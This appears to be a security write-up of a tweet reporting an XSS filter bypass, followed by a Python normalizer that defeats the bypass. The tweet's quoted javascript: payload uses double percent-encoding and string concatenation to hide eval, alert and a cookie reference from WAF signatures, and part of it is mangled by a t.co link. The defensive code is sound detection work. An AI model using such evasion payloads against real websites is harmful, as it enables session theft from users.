The tweet reports an XSS finding together with a WAF bypass that uses a JavaScript payload. The payload hides the eval and alert names behind string concatenation and percent-encoding, so a signature that looks for those names in the raw request does not match. Although the XSS vulnerability itself is out of scope, the bypass technique is noteworthy. More details can be found at https://t.co/CAVWW6Q75e
Found XSS + WAF bypass, but just realize XSS is out of scope LOL
so I'll drop it here
javascript:top['e'+''+decodeURIComponent('%2576')+'a'+'l'](decodeURIComponent('%2561')+decodeURIComponent('%256c')+'ert'+'(docume'+'https://t.co/CAVWW6Q75e'+'okie)');//
— 0xdead4f (@0xdead4f) May 5, 2025
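The reason this kind of payload slips past a signature-based WAF is that the filter matches on the raw request while the browser only executes the payload after percent-decoding the javascript: URL, resolving the decodeURIComponent() calls and joining the concatenated string literals. The following is an added example, not code from the tweet author or from any WAF product: a small normalizer that performs those same steps before keyword matching. The sample payload is constructed to mirror the obfuscation shape shown in the tweet (double percent-encoding plus '+' concatenation) with harmless content, and the KEYWORDS list and the two regular expressions are assumptions standing in for a real rule set.

```python
import re
from urllib.parse import unquote

# Names a simplified signature rule would look for once obfuscation is removed (assumed rule set).
KEYWORDS = ("eval", "alert", "document.cookie")

# decodeURIComponent('<literal>') calls whose argument is a plain string literal
_DECODE_CALL = re.compile(r"decodeURIComponent\('([^']*)'\)")
# two adjacent single-quoted literals joined with '+': 'a' + 'b'
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def normalize(payload: str, max_rounds: int = 10) -> str:
    """Undo the obfuscation layers a browser would undo before running the code.

    Each round: one percent-decode of the whole string (what the browser does to a
    javascript: URL on navigation), then constant-fold decodeURIComponent('...') calls,
    then merge adjacent string literals until nothing changes. The round count is bounded
    so a deeply nested encoding cannot turn the normalizer into a CPU sink.
    """
    s = payload
    for _ in range(max_rounds):
        prev = s
        s = unquote(s)
        s = _DECODE_CALL.sub(lambda m: "'" + unquote(m.group(1)) + "'", s)
        while True:
            joined = _CONCAT.sub(r"'\1\2'", s)
            if joined == s:
                break
            s = joined
        if s == prev:  # fixed point reached, no more layers to strip
            break
    return s


def find_keywords(text: str) -> list:
    """Return the watched names that appear literally in the given text."""
    return [k for k in KEYWORDS if k in text]


# Constructed sample: same double-encoding and concatenation pattern as the tweet, harmless body.
SAMPLE = (
    "javascript:top['e'+''+decodeURIComponent('%2576')+'a'+'l']"
    "(decodeURIComponent('%2561')+'lert(1)')"
)

if __name__ == "__main__":
    print("raw        :", find_keywords(SAMPLE))             # [] -> signature misses it
    print("normalized :", find_keywords(normalize(SAMPLE)))  # ['eval', 'alert']
    print(normalize(SAMPLE))
```

Run on the raw sample the keyword check returns nothing, which is exactly the blind spot the tweet exploits; after normalization the same check reports both eval and alert. A production filter would apply the same idea to the other encodings a browser tolerates (Unicode and hex escapes, HTML entities in attribute context) and keep the decode depth bounded.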